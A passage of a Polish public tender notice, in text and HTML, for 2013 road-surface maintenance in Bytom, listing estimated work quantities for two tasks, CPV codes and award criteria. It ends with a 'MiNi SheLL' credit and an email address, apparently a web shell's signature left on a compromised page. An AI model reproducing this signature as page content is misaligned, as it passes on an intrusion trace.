	a/ dla Zadania nr 1 - drogi krajowe, wojewódzkie i powiatowe:
Lp.	Rodzaj robót	zakładana ilość robót	jednostka
1	Remont cząstkowy nawierzchni bitumicznej do 5m2 z ułożeniem taśmy bitumicznej  40 mm x 10 mm 	240	t
2	Mechaniczna rozbiórka nawierzchni bitumicznej grub. 10 cm	5 000	m2
3	Ręczne ułożenie nawierzchni bitumicznej grub. 5 cm (w-wa wiążąca)	600	m2
4	Ręczne ułożenie nawierzchni bitumicznej (w-wa ścieralna) grub. 5 cm łącznie z ułożeniem taśmy bitumicznej 40 mm x 10 mm 	600	m2
5	Mechaniczne ułożenie nawierzchni bitumicznej (w-wa wiążąca) grub. 5 cm	3 000	m2
6	Mechaniczne ułożenie nawierzchni bitumicznej (w-wa ścieralna) grub. 5 cm  z ułożeniem taśmy bitumicznej 40 mm x 10 mm	3 000	m2
7	Cięcie piłą mechaniczną nawierzchni bitumicznej grub. 6 - 10 cm	200	m 
8	Frezowanie nawierzchni bitumicznej o grub. 10 cm	12 000	m2
9	Wyrównanie nawierzchni masą asfaltową na zimno	40	t
10	Regulacja pionowa krat ściekowych ulicznych	20	szt
11	Regulacja pionowa włazów kanałowych	20	szt
12	Regulacja pionowa studzienek dla zaworów wodociągowych i gazowych	10	szt
13	Remont cząstkowy nawierzchni bitumicznej asfaltem lanym grysowym	140	t
14	Wyrównanie nawierzchni bitumicznej asfaltem lanym grysowym (bez wycinania)	50	t
15	Plantowanie poboczy	8 000	m2
16	Wypełnienie szczelin masą zalewową w nawierzchni bitumicznej	4 000	m
17	Rozebranie krawężnika betonowego 15 x 30 cm	800	m
18	Ułożenie nowego krawężnika betonowego 15 x 30 cm na ławie betonowej z oporem 	800	m
19	Przestawienie krawężników kamiennych 25 x 35 cm	200	m
20	Przestawienie krawężników betonowych 15 x 30 cm	200	m
21	Mechaniczne wykonanie koryta w gruncie kategorii IV-ej na głębokość 20 cm	1 300	m2
22	Mechaniczne wykonanie podbudowy z żużla stalowniczego (wielkopiecowego) o grubości w-wy 20 cm	1 300	m2
23	Ułożenie nawierzchni z kostki betonowej nowej grubości 8 cm szarej na podsypce cementowo-piaskowej	1 000	m2
24	Ułożenie nawierzchni z kostki betonowej nowej grubości 8 cm kolorowej na podsypce cementowo-piaskowej	300	m2
25	Rozebranie i ułożenie kostki kamiennej rzędowej od 14 cm do 19 cm - z odzysku	1 000	m2
26	Rozebranie i ułożenie kostki kamiennej nieregularnej do 14 cm - z odzysku	1 000	m2
27	Ażur. ułożenie nawierzchni z płyt betonowych ażurowych nowych grubości 10 cm	500	m2


5.	Podczas prowadzenia robót w pasie drogowym należy dokonać ich prawidłowego oznakowania, które musi być zgodne z załącznikiem do Rozporządzenia Ministra Infrastruktury z dnia 03.07.2003r. w sprawie szczegółowych warunków technicznych dla znaków i sygnałów drogowych oraz urządzeń bezpieczeństwa ruchu drogowego i warunków ich umieszczania na drogach (Dz. U. z 2003r,  Nr 220,  poz. 2181 z  późn. zm.).

6.	Podane w SIWZ i załącznikach do SIWZ ilości robót do wykonania są orientacyjne (szacunkowe), mają służyć  do porównania i oceny ofert  oraz dokonania wyboru najkorzystniejszej oferty. Faktyczne ilości mogą się różnić od ilości zakładanych (szacowanych), w zależności od występujących potrzeb Zamawiającego w okresie realizacji przedmiotu zamówienia. Wynagrodzenie wykonawcy stanowić będzie iloczyn faktycznie wykonanych robót i cen jednostkowych podanych w ofercie, do maksymalnego zobowiązania Zamawiającego wynikającego z umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.23.32.20-7, 45.23.32.23-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> 2/	Zadanie nr 2 - drogi gminne i wewnętrzne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest bieżące utrzymanie nawierzchni jezdni na terenie Gminy Bytom w 2013 roku 

2.	Przedmiot zamówienia opisany został szczegółowo w:
1/	Przedmiarach Robót;
2/	Specyfikacjach Technicznych Wykonania i Odbioru Robót Budowlanych (STWiORB);
3/	Założeniach do kalkulacji robót;
4/	Wzorze Umowy; 
stanowiących załączniki do niniejszej specyfikacji.

3.	Wykonawca winien udzielić co najmniej 36-miesięcznej gwarancji i rękojmi na wykonane roboty i zastosowane materiały, liczonej od dnia odbioru końcowego robót, potwierdzonego protokołem końcowym.

4.	Zamawiający przewiduje w trakcie realizacji zamówienia następujące rodzaje i orientacyjne (szacunkowe) ilości robót do wykonania:

	b/ dla Zadania nr 2 - drogi gminne i wewnętrzne:
Lp.	Rodzaj robót	zakładana ilość robót	jednostka
1	Remont cząstkowy nawierzchni bitumicznej z ułożeniem taśmy bitumicznej 40 mm x 10 mm 	10	t
2	Mechaniczna rozbiórka nawierzchni bitumicznej grub. 10 cm	400	m2
3	Ręczne ułożenie nawierzchni bitumicznej gr. 5 cm (w-wa wiążąca)	400	m2
4	Ręczne ułożenie nawierzchni bitumicznej (w-wa ścieralna) grub. 5 cm łącznie z ułożeniem taśmy bitumicznej 40 mm x 10 mm 	1 600	m2
5	Mechaniczne ułożenie nawierzchni bitumicznej (w-wa wiążąca) grub. 5 cm	4 000	m2
6	Mechaniczne ułożenie nawierzchni bitumicznej (w-wa ścieralna) grub. 5 cm łącznie z ułożeniem taśmy bitumicznej 40 mm x 10 mm 	8 000	m2
7	Cięcie piłą mechaniczną nawierzchni bitumicznej grub. 6 - 10 cm	400	m 
8	Frezowanie nawierzchni bitumicznej grub. 10 cm	10 000	m2
9	Wyrównanie nawierzchni masą asfaltową na zimno	10	t
10	Regulacja pionowa krat ściekowych ulicznych	20	szt
11	Regulacja pionowa włazów kanałowych	20	szt
12	Regulacja pionowa studzienek dla zaworów wodociągowych i gazowych	10	szt
13	Remont cząstkowy nawierzchni bitumicznej asfaltem lanym grysowym	50	t
14	Wyrównanie nawierzchni bitumicznej asfaltem lanym grysowym (bez wycinania)	12	t
15	Plantowanie poboczy	100	m2
16	Wypełnienie szczelin masą zalewową w nawierzchni bitumicznej	200	m
17	Rozebranie krawężnika betonowego 15 x 30 cm	200	m
18	Ułożenie nowego krawężnika betonowego 15 x 30 cm na ławie betonowej z oporem 	100	m
19	Przestawienie krawężników kamiennych 25 x 35 cm	200	m
20	Przestawienie krawężników betonowych 15 x 30 cm	200	m
21	Mechaniczne wykonanie koryta w gruncie kategorii IV-ej na głębokość 20 cm	200	m2
22	Mechaniczne wykonanie podbudowy z żużla stalowniczego (wielkopiecowego) o grubości w-wy 20 cm	200	m2
23	Ułożenie nawierzchni z kostki betonowej nowej grubości 8 cm szarej na podsypce cementowo-piaskowej	100	m2
24	Ułożenie nawierzchni z kostki betonowej nowej grubości 8 cm kolorowej na podsypce cementowo-piaskowej	20	m2
25	Rozebranie i ułożenie kostki kamiennej rzędowej od 14 cm do 19 cm - z odzysku	1 000	m2
26	Rozebranie i ułożenie kostki kamiennej nieregularnej do 14 cm - z odzysku	200	m2
27	Ażur. ułożenie nawierzchni z płyt betonowych ażurowych nowych grubości 10 cm	20	m2


5.	Podczas prowadzenia robót w pasie drogowym należy dokonać ich prawidłowego oznakowania, które musi być zgodne z załącznikiem do Rozporządzenia Ministra Infrastruktury z dnia 03.07.2003r. w sprawie szczegółowych warunków technicznych dla znaków i sygnałów drogowych oraz urządzeń bezpieczeństwa ruchu drogowego i warunków ich umieszczania na drogach (Dz. U. z 2003r,  Nr 220,  poz. 2181 z  późn. zm.).

6.	Podane w SIWZ i załącznikach do SIWZ ilości robót do wykonania są orientacyjne (szacunkowe), mają służyć  do porównania i oceny ofert  oraz dokonania wyboru najkorzystniejszej oferty. Faktyczne ilości mogą się różnić od ilości zakładanych (szacowanych), w zależności od występujących potrzeb Zamawiającego w okresie realizacji przedmiotu zamówienia. Wynagrodzenie wykonawcy stanowić będzie iloczyn faktycznie wykonanych robót i cen jednostkowych podanych w ofercie, do maksymalnego zobowiązania Zamawiającego wynikającego z umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.23.32.20-7, 45.23.32.23-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com